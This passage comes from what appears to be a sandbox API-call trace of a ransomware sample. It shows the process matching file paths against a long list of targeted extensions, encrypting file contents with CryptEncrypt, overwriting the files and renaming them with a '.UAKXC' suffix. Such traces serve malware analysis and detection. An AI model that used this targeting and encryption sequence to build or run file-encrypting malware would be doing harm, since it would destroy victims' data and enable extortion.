Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".vis") returned=".VISIO.DEV.14.1033.hxn" [0141.244] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.244] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.266] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.266] SetEndOfFile (hFile=0x6c8) returned 1 [0141.274] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.274] ReadFile (in: hFile=0x6c8, lpBuffer=0x4610000, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x15e, lpOverlapped=0x0) returned 1 [0141.274] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.274] WriteFile (in: hFile=0x6c8, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x15e, lpOverlapped=0x0) returned 1 [0141.274] CloseHandle (hObject=0x6c8) returned 1 [0141.279] GetProcessHeap () returned 0xea0000 [0141.279] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0141.279] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" [0141.279] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.UAKXC" [0141.279] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn.uakxc")) returned 1 [0141.280] GetProcessHeap () returned 0xea0000 [0141.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0141.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef0d0 | out: hHeap=0xea0000) returned 1 [0141.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d08 | out: hHeap=0xea0000) returned 1 [0141.280] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0141.280] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0141.280] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0141.281] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn")) returned 0x2022 [0141.281] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0141.281] GetLastError () returned 0x0 [0141.281] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=350) returned 1 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.282] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.283] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.284] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.285] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.286] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.287] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.288] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpSrch=".vis") returned=".VISIO_STD.14.1033.hxn" [0141.288] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.288] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.290] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.290] SetEndOfFile (hFile=0x6c8) returned 1 [0141.290] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.290] ReadFile (in: hFile=0x6c8, lpBuffer=0x4610000, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x15e, lpOverlapped=0x0) returned 1 [0141.290] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.290] WriteFile (in: hFile=0x6c8, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x15e, lpOverlapped=0x0) returned 1 [0141.290] CloseHandle (hObject=0x6c8) returned 1 [0141.295] GetProcessHeap () returned 0xea0000 [0141.295] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0141.296] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" | out: 